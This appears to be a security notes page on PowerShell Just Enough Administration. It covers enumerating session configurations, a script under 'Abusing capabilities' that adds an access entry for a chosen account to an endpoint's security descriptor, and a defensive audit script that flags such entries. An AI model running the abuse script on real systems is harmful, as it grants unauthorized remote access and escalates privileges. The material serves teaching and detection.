# Just Enough Administration (JEA)

Just Enough Administration (JEA) is a security technology that enables delegated administration for anything managed by PowerShell. With JEA, you can:

* **Reduce the number of administrators on your machines** using virtual accounts or group-managed service accounts to perform privileged actions on behalf of regular users.
* **Limit what users can do** by specifying which cmdlets, functions, and external commands they can run.
* **Better understand what your users are doing** with transcripts and logs that show you exactly which commands a user executed during their session.

## Viewing PSSession configuration

```powershell
Get-PSSessionConfiguration
```

![](https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2FSL5lEq5CG82qPNyGbmPo%2Fimage.png?alt=media\&token=afd32fc9-df7e-429f-93fc-421db03531ef)

## Get the capabilities of the PSSession

```powershell
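# Both values are placeholders: the session configuration name and the user to evaluate
Get-PSSessionCapability -ConfigurationName 'ConfigurationName' -Username 'DOMAIN\user'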
```

![](https://1029482190-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FVonnsWh96xLbzU5ncJWZ%2Fuploads%2FOMCC7GQd0OZLLNIx9Tn5%2Fimage.png?alt=media\&token=ccdca0b9-2f86-4fc4-b288-1f668d42a91a)

## Abusing capabilities

### Set-PSSessionConfiguration

The `Set-PSSessionConfiguration` cmdlet changes the properties of the session configurations on the local computer.

With `Set-PSSessionConfiguration` you can add permissions to a PSSession configuration by appending an access control entry to its security descriptor.

```powershell
# The identity to add permissions for
$Identity = "domain\vanessa"

# The configuration whose permissions will be changed (the default endpoint is 'microsoft.powershell')
$sessionConfigurationName = 'ITAccess'

# Get the current security descriptor (SDDL) of that configuration
$sddl = (Get-PSSessionConfiguration -Name $sessionConfigurationName).SecurityDescriptorSddl

# Build the new Access Control Entry object
$rights = -1610612736 # 0xA0000000 = GENERIC_READ | GENERIC_EXECUTE (read and invoke access)
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $Identity).Translate(
	[System.Security.Principal.SecurityIdentifier])).Value

$newAce = New-Object System.Security.AccessControl.CommonAce(
	[System.Security.AccessControl.AceFlags]::None,
	[System.Security.AccessControl.AceQualifier]::AccessAllowed,
	$rights, $IdentitySID, $false, $null
)


# Prepare the RawSecurityDescriptor
$rawSD = New-Object -TypeName System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl
if ($rawSD.DiscretionaryAcl.GetEnumerator() -notcontains $newAce) {
	$rawSD.DiscretionaryAcl.InsertAce($rawSD.DiscretionaryAcl.Count, $newAce)
}
$newSDDL = $rawSD.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)


# Set the PSSessionConfiguration permissions
Set-PSSessionConfiguration -Name $sessionConfigurationName -SecurityDescriptorSddl $newSDDL


# Verify permissions were added
(Get-PSSessionConfiguration -Name $sessionConfigurationName).Permission -split ', '
```
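To see the result of a change like this from the defender's side, the following added example (not part of the original page) expands each session configuration's SDDL into its access control entries and reports allow entries for identities outside an expected baseline. The helper name `Get-SessionConfigurationAce`, the `$ExpectedSids` baseline and the sample SID are assumptions made for illustration.

```powershell
# Baseline of SIDs expected on an endpoint ACL (assumption: adjust per environment)
$ExpectedSids = @(
    'S-1-5-32-544'  # BUILTIN\Administrators
    'S-1-5-32-580'  # BUILTIN\Remote Management Users
    'S-1-5-4'       # NT AUTHORITY\INTERACTIVE
)

# Hypothetical helper: expand an endpoint's SDDL into one object per DACL entry
function Get-SessionConfigurationAce {
    param(
        [Parameter(Mandatory)] [string] $Name,
        [Parameter(Mandatory)] [string] $Sddl
    )
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $Sddl
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        # Resolve the SID to an account name; unresolvable SIDs are reported as-is
        try   { $account = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $account = $sid.Value }
        [pscustomobject]@{
            Configuration = $Name
            Account       = $account
            Sid           = $sid.Value
            AceType       = $ace.AceQualifier
            AccessMask    = '0x{0:X8}' -f $ace.AccessMask
            InBaseline    = $ExpectedSids -contains $sid.Value
        }
    }
}

# Constructed sample: default-style DACL plus one extra GXGR (0xA0000000) entry
# for a made-up domain SID, the kind of entry the script above appends
$sampleSddl = 'O:NSG:BAD:P(A;;GA;;;BA)(A;;GA;;;IU)(A;;GA;;;RM)' +
              '(A;;GXGR;;;S-1-5-21-1111111111-2222222222-3333333333-1105)'
Get-SessionConfigurationAce -Name 'ITAccess (sample)' -Sddl $sampleSddl |
    Where-Object { $_.AceType -eq 'AccessAllowed' -and -not $_.InBaseline }

# Live audit (elevated prompt): list allow entries outside the baseline
Get-PSSessionConfiguration |
    Where-Object { $_.SecurityDescriptorSddl } |
    ForEach-Object { Get-SessionConfigurationAce -Name $_.Name -Sddl $_.SecurityDescriptorSddl } |
    Where-Object { $_.AceType -eq 'AccessAllowed' -and -not $_.InBaseline }
```

Run against the constructed sample, the only row returned is the made-up domain SID with access mask `0xA0000000`, which matches the `$rights` value used in the script above.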

## References

* <https://cheats.philkeeble.com/active-directory/ad-privilege-escalation/jea>
* <https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.2>
